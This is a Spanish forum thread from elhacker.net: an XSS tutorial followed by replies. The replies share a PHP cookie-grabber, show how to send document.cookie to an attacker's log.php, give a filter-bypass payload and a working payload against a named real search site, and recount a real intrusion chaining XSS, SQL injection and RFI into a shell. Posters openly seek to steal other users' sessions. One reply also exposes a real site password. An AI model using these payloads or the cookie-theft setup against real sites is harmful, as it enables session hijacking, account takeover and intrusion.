Foro de elhacker.net

Los Poderes Secretos de XSS por
sirdarckcat.


XSS aka Cross Site Scripting es el ataque basado en la explotacion de vulnerabilidades de el sistema de validación de HTML incrustado.
El problema es que normalmente no se valida correctamente, esta vulnerabilidad puede estar de forma directa (foros, mensajes de error, etc..) o indirecta (redirecciones, framesets, etc..)
cada una se trata de forma diferente:

Tipo	Manejo
Directa	Este tipo de XSS, es el que normalmente es censurado, asi que es muy poco comun que puedas usar tags como <script o <iframe, sinembargo nunca es malo probar, para ver formas de pasar estas protecciones, debes de saber mas de HTML que el creador del sitio
Indirecta	Esta es un tipo de vulnerabilidad, muy comun, y muy poco explotada, consiste en modificar valores que la aplicacion web utiliza para pasar variables entre 2 paginas, sin usar sesiones.

Indirecta
Explicare primero la Indirecta, ya que es la menos censurada.
Esta sucede cuando hay un mensaje o una ruta en la URL del navegador o en la cookie.
para saber el contenido de una cookie, sin usar ningun tipo de iecv o addin para tu navegador, puedes usar el siguiente script, solo colocalo en la barra de direcciones, y presiona Enter.
una vez dentro podras modificar la cookie a tu antojo, si pones cancelar la cookie se borrará.
ahora, que podemos ver con este ejemplo?
que podemos meter comandos javascript solo modificando una URL, como puedes aventajarte de esto?

Usando FrameSets
bien, regresemos al ejemplo de el frameset, que segun la pagina que coloques te crea un frame a esa pagina.
que pasara si pones, en esa URL
y el link, lo pones en un foro, un navegador incauto, va a verlo y dira, bueno, es del mismo dominio, no puede ser nada malo.. y de resultado tendra un loop infinito.

Ahora, hasta ahi llegan los newbies, pero vamos a evolucionar un poco, ahora, que tal que pones un script que tome tu cookie, y mande un mp a el administrador, o incluso, que borre todos tus post en X foro, todo esto es posible.. y solo necesita un poco de imaginación.
Ahora lo que va.. el robo de cookies, es lo mas basico, y tiene como objetivo robar la cookie.. me diran, y eso de que sirve? tengo el PHPSESSID, y si el usuario ciera sesion no me servira de nada.
tienes razon, pero por ejemplo, con el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu password.. esto va cobrando seriedad no?
ahora que mas?
Otro uso comun para estas vulnerabilidades es lograr hacer phishing, o colocar un Xploit..
tu ves la barra de direcciones, y ves que estas en una pagina, pero realmente estas en otra.. metes tu pass, y ya valiste.
Pero lo que me gusta mas, son los sitios de descarga, que colocan en la misma url, el sitio de objetivo.. esas paginas, son vulnerables a ataques XSS indirectos directos xD
osea, puedes colocar una imagen con link al sitio malicioso, y se ejecuta, sin que el usuario lo sepa.
Incluso PODIAS borrar un post en phpBB, o hacerte admin (era posible, no me molesten, claro que si), con este tipo de vulnerabilidad.
Ahora, vamos al siguiente tipo indirecto.

Mensaje personalizado
Estas, son forsosamente para links, no funciona en imagenes (al menos no he visto ninguna que sirva.) y va en esta forma:
esa pagina, es vulnerable a XSS Indirecto.
con esto puedes meter casi lo que sea ahi dentro.
un <script> que te cree otra sesion bajo otro usuario, y tu sesion actual la mande a el atacante (es lo que explicaba de cURL hace un momento), o lo que sea.. aqui hay muy pocas limitantes.
Voy a explicar como puedes modificar TODA la pagina, osea todo su aspecto, con una vunerabilidad como esta.
con este codigo, se borra todo el contenido de la pagina, y escribe otra cosa:
muy complicado?
esto tiene muchos usos potenciales..

Directa
Esta es la mas divertida, y es cuando en por ejemplo.. un foro como este puedo meter un tag, y ejecutar un codigo, que pueda hacer casi lo mismo, o lo mismo que el Indirecto de Mensaje.
Funciona localizando puntos debiles en la programación de los filtros, asi que si por ejemplo, logran quitar los <iframe, <script etc.. siempre puedes poner un <div malicioso, o incluso un <u> o <s>, etc.. tags que casi siempre estan permitidos.
Esto pone los pelos de punta a muchos webmasters, afortunadamente, muchos no saben del "lado obscuro" de HTML + IExplorer :)
colocare una sección del CheatSheet de RSnake (http://ha.ckers.org/xss.html)Entre muchos otros, les recomiendo, que cuando busquen vulnerabilidades XSS, entren a esa página muy buena recopilación., voy a profundizar en ún tipo de esos ataques.
usar Style es increiblemente facil de usar, y muchos filtros son vulnerables.
quien se va a imaginar que puedes meter cosas en este!! pues ya ven.. si puedes :)
logicamente no vas a meter todo en el espacio que tienes, puedes usar:

AJAXSS
Este es un tipo de XSS no tan conocido, pero peligroso.
se basa en usar cualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y desde ahi enviar contenido POST, GET, etc.. automaticamente, sin conocimeinto del usuario, un Bug de XSS, usando esta tecnica en MySpace de MSN, permitio que una persona, lograra tener mucha fama (y es que pudo haber hecho cosas malas, afortunadamente solo hizo esto)
El potencial de este tipo de ataque es infinitamente alto, asi que "Be scared", porque parece ser que tiene un futuro prometedor.

El siguiente script obtiene el valor de las cabezeras de autenticacion de un sistema basado en Basic Auth. solo habria que decodificarlo, pero es mas facil mandarlo codificado a tu log de contraseñas, la codificacion es base64.


log.php para registrar cookies

Links

• Anexo(ADB.htm) -Codificador URL, UTF-8 y de Entidades HTML
• Anexo(EUU.htm) -Codificador Hexadecimal, Decimal, Binario
• Anexo(b64.htm) -Codificador y decodificador de Base64 y Radix64
• http://ha.ckers.org/xss.html -Gran recopilatorio de ataques XSS comunes

(c) Sirdarckcat 2005
Autorizo la reproduccion total o parcial de este documento de acuerdo con la licencia de documentación libre de GNU, una copia puede ser encontrada en http://www.gnu.org/

muy buen manual.
es sobre un tema que no manejo bien y esto seguro ayuda :D

Ahora me lo leere y votare aunque seguro que es muy bueno.

 :-* tendre que mirarlo detalladamente para enterarme mejor,pero parece util.gracias por postearlo!!

Hola como utilizaria el  log.php para guardar una cookie? :huh:

por que solo abriendolo ej. www.site.com/log.php  solo te guarda esto Como seria la url para que se guarde la cookie?
no es algo asi de  "www.site.com/log.php?variablenosecual=document.cookie no se que mas"

Alguien me explica?

Por favor.
Saludos ;D ;D ;D

sitio.com/log.php?c=cookie
sitio.com/log.php?id=basicauth

Saludos!!

Una cosa que no me queda clara aun es como si el usuario abre la web malefica:
¿como se le roba la cookie y la puedes guardar en tu servidor?
O sea que al abrir la web con el codigo html inyectado se habra otra ventana donde esta la url de mi modulo php y la variable sea igual a la cookie.
Saludos  ::)

con un script..

las cookies se pueden acceder desde javascript, con la variable
document.cookie

mira, escribe esto en la barra de direcciones de tu navegador:
javascript:alert(document.cookie);

de hecho hay una manera de sacar el IP y el referrer xD pero eso no sirve denada.. si lo vas a enviar a un log, porque PHP los saca solito

hace poco morris y yo estabamos haciendo un ataque con una vulnerabilidad de XSS, nos banearon pero seguiamos hasta que parchearon el bug :(, aun asi el ataque fue un exito ;) y ahora no puedes entrar a esa pagina desde México xDDD usabamos XMLHTTP o AJAX, y si el usuario usaba IE6 podiamos sacar su password jaja, era todo un desm*dr3 xD

Saludos!!

Ya, pero me refiero a que he visto a veces esto:
Eso seria desde el navegador en la ruta de direcciones, pero como seria que automaticamente al visitar la web se hiciera eso.
Saludos  ::)

enserio viste eso?
eso no va a servir
es algo asi:
:)

Saludos!!

XSS + SQL Iny + RFI

Encontré una Web que gracias a un bug de XSS econtre un SQL Inyection y despues un RFI, porque digo esto?
para poner como ejemplo que XSS si es un asunto serio.

El XSS se encontraba en un TAG Board, que esta en todas las web a las que entras en el sitio, es parecido a php_nuke.
lo unico que hice con mi script, es notificarme a cuales páginas entraban los usuarios, y guardaba todos los submits en cookies para despues mandarlas a mi log tambien.
(El robo de cookies no funcionaba, el sistema guardaba la ip en la sesión)
yo esperaba que el admin pusiera su pass, y listo :P, pero nunca paso esto.. :(, consegui de muchos usuarios mortales, talvez el admin ya tenia iniciada su sesion con cookies.. y no podia cerrarsela, porque tenia limite de longitud mi bug.
SIN embargo, aun sin conseguir el pass de admin sabia a que paginas entraba este.. era muy facil saberlo, porque todas estaban en la carpeta /admin/
Despues de andar monitoreando sus movimientos un buen rato, vi que cuando entraba a poner una noticia, se enviaba en Post un numero.
Si tuviera acceso a ese documento sin ser admin, me hubiera ahorrado muchos problemas, pero pues.. como la ven que no.
El script, no lo podia modificar, ni podia poner otro, asi que debia encontrar una manera de enviar la información.
El antiguo bug de GET=POST en php, me ayudo.
Este sitio tenia foro, asi que lo unico que debi hacer fue:
(Modificado obvio!!)

nid es donde se guardaba el numero, tno el titulo mno es el mensaje y tn es el tema, lo puse en el ultimo para que no llamara la atencion.

Si se creaba la noticia era porque no habia inyección, si no se creaba, era porque si habia.

Ahora, esto parece una inyección mas dificil que un blind no? jaja
ahi fue donde entro el RFI.
Al parecer si habia inyección SQL, pero no se como diablos estabala sentencia que se creo la noticia, pero en el titulo se guardo (modificado):
ese 23 es de el tema, :P
Solo tuve que mandar otro MP al admin, ahora preguntandole, porque no me respondio mi post de quiero ser admin xD.
pero ahora con esta imagen:
el ? del final es porque el script agrega th.php al final
:P listo, ahora entraba con method POST y una variable en un formulario ya diseñado a:
http://site.com/index.php
y se creaba una consola de shell.
NO hice deface. yo estoy encontra de los defaces.
no es la gran cosa, es como cualquier 0wn3d, pero quize publicarlo, porque se me hizo gracioso, como este ataque fue de un tipo a otro, sin quererlo realmente.

Este sistema web es independiente, pero dicen que lo quieren vender jeje, si lo saca.. tendra los primeros 3 bug a los 15 segundos xD


Saludos!!

Porque solo me guarda esto y no la cookie entera??

USUARIO Y PASSWORD:
Cookie: BSUID=1; ASLTRG1=28
Pagina:
IP: 212.78.xxx.xxx
Fecha y Hora: 16 March, 2006, 8:50 pm


y solo guarda si abro la web si la abre otro nada  estoy usando hosting lycos (nose si sera por eso)
probe con otro cookie grabber y solo me guardaba si la abria yo tambien pero grababa todo.. el otro es:

<?php
cookie=$_REQUEST['cookie'];
$openfile = fopen("cookies.txt", "a");
fwrite($openfile, "$cookie\n");
fclose($openfile);
?>

deceiver:
¿como es la cookie completa?

Saludos!!

ESta es la cookie entera.

hhr=4347; BSUID=1; FRQSTR=19042219|19042219|19042219|19042219|19042219; WIDYMD=#30554:FCP#; KIDYMD=#225393:FCPB#202979:FCGC#202984:FCFA#231288:FBDA#; ASLTRG1=28#24#.es#604#1335#.inversas.jazztel.es#62.14.155.30#es##-9718#1334#1229#0#0

algo asi pero esque si la abre alguien que no sea yo nisiquiera guarda el principio¿porque puede ser? alguna idea?

gracias, un saludo

Encontre otro cookie grabber que funciona bien pero me guarda un trozo o otro aqui 3 diferentes que me guardo

FRQSTR=19042251|19042251|19042251|19042251|19042251; ASLTRG1=28


 BSUID=1; FRQSTR=19012244x202979:1:5108|19012244|19012244|19012244|19012244; WIDYMD=



FRQSTR=18802497|18802497|18802497|18802497|18802497

en ninguna me la guarda entera pero al menos con este guarda un trozo aunque no la abra yo.. el 19042251|19042251|19042251|19042251|19042251 deduzco que sera la password ¿porque puede ser SirdarckCat?

asegurate de que antes de enviar el valor de la cookie, le hagas un escape, escape(document.cookie).. :/

Saludos!!

Era eso muchas gracias.. :)

una ultima cosa las cookies son algo raras usan KIDYMD=* e visto muchos blogs busandolo pero no veo nada en md5  y no encuentro nada de info sobre esto ¿sabes que es esto? gracias

solo encontre blogs y cosas asi con KIDYMD= y demas.. y buscando encontre esto http://users.cjb.net/ebaumcookies/noip.txt ^^
cookies de ebaum o algo asi en las mayorias esta el KIDYMD pero suele estar la pw en md5 y en la mia no :%

Espero tu respuesta un saludo :)

En eso ya no te pudo ayudar xD, te toca a ti, ver que hace.. mucha suerte!!

Lamentables estos filtros sugeridos por usuarios de php.net:

http://72.14.203.104/search?q=cache:P6cmiyv-2GIJ:www.php.net/strpos&hl=es&gl=mx&ct=clnk&cd=1
http://www.php.net/strpos

se saltan todos asi:
<sCripT >/*<scriPt >/**/alert();</scrIpt >

xD

Todavia no entendido muy bien, ya tengo mi log.php y un log2.htm. si yo quiero la cookie de alguien le mando que entre a www.misitio.com/log.php  ????
o que debo hacer?? y que cookie me guarda???
Gracias!!! ;D

no.. lee el manual otra ves ;)
debes encontrar un bug de XSS en la web, y colocar un codigo masomenos asi:
eso debe mandarte la cookie.. del sitio afectado.

saludos!!

Ya entendi, justo lei otro manual y me quedo claro.. ahora pregunto en  un a web en asp es metodo get es lo mimso no?Gracias

GET es lo que recibes por la barra de direcciones.. mira, pon esto en la barra de direcciones:
javascript:alert(document.location.search):

esa es la info en metodo GET, en metodo POST, se manda con las cabeceras, por lo que no la puedes ver a menos que uses un proxy.

Saludos!!

soy un fan de este truco juaz':P

sigh no encuentro ningun sitio vulnerable en javascript.

esta chido el manual tio gracias

Hola Sirdarckcat, perdón por remover el tema pero aún no me ha quedado claro del todo... y he leído bien la guía...

La cosa está en que encontré la vulnerabilidad XSS en el archivo phpinfo.php de esa página... entonces para probar me creé una cuenta y demás y al acceder a ese archivo normalmente con mi cuenta logueada me encuentro que abajo del todo muestra la cookie... el problema es que no sé hacer bien la redirección a mi log.php para que me guarde la cookie de la página... he probado de muchas maneras pero nada, no hay forma... necesito saber que colocar detrás de:

www.xxx.com/phpinfo.php

para que funcione el asunto...

Gracias desde ya. Un saludo

El manual me parecio bueno. No tengo bien en claro como aplicar los XSS.

    Se que este tema esta cerrado....  pero tras leer el manual de XSS y felicitar a su creador, no solo por un buen manual, sino pq se ve que realmente tiene muuchos conociemientos al respecto. Solo me queda añadir que me gustaria que fuese mas practico, calro..si..ya entiendo.... no puede ni podrá serlo......   

   En definitiva te abre el apetito con este tema tan interesante y supongo que me tendré que pasar muuuchas horas leyendo muchas cosas para sacar realmente jugo a este tutorial. Pero CUANDO NO ES ASI???  jajaja no puede ser de otro modo para aprender... aunke la impaciencia me pueda.

  Feliciataciones nuevamente

¿Algo práctico? mmm, dirijamonos a Google para buscar inurl:buscar.php (http://www.google.es/search?hl=es&q=inurl%3Abuscar.php), intentaremos encontrar algún XSS en el buscador de alguna página.

Primer resulado: UOL :: Buscador, si nos fijamos en la URL podremos observar que el formato es el siguiente: http://buscar.uol.com.ar/radaruol.html?q=palabraabuscar.

Ahora buscaremos palabraabuscar en el código fuente de la página web:


La palabra se encuentra entre comillas, así que ahora intentaremos pasarle a la variable unas comillas para salir de value y luego un > para salir de la etiqueta input.

http://buscar.uol.com.ar/radaruol.html?q=">palabraabuscar (http://buscar.uol.com.ar/radaruol.html?q=">palabraabuscar).


Claramente es vulnerable a las inyecciones XSS...

http://buscar.uol.com.ar/radaruol.html?q="><script>alert(document.cookie)</script> (http://buscar.uol.com.ar/radaruol.html?q="><script>alert(document.cookie)</script>)

 
  Gracias a vosotros e descubierto una vulnerabilidad de XSS en la web de la empresa en la que trabajo. Por supuesto fue puesto en su conociemiento en arreglado en cuestion de minutos.


    Menos mal que he podido averiguarlo aprendiendo de vuestros tutoriales. Aunke la empresa contratada para hacer la pagina web le molesto un poco el asunto, no les quedo otra que reconocerlo.... sobre todo despues de enviarles la captura de pantalla jajajajjaja.

    De nuevo gracias y seguid asi....  especialmente yeikos y sidkart....  os debo una cerveza a cada uno.

Estoy haciendo mi pagina web y ya hice un formulario de ingreso que al verificar la contraseña me direcciona a la pagina que yo quiero, esta parte esta todo bien, pero el drama que tengo que la pagina que pretendo protejer con este sistema no me sirve ya que cualquiera la copia de la barra de direcciones y listo, ¿como puedo hacer para ocultar la real direccion, te dejo la direccion de mi pagina, para que te des cuenta de lo que digo, usa la contraseña: jcs0101 y en tipo de cliente pone empleados te lleva a la pagina que es pero no me sirve de nada pnerle contraseña si copiando la direccion cualquiera puede entrar ¿como puedo hacer para que siga figurando siempre en la barra de direcciones esto http://www.actiweb.es/estudiojuancsuarez y no esto http://www.actiweb.es/estudiojuancsuarez/empleados.html que en ralidad seria la real, si puedes escribime a juancsuarez1@yahoo.com.ar

Muchas gracias por compartir.
Buen documento.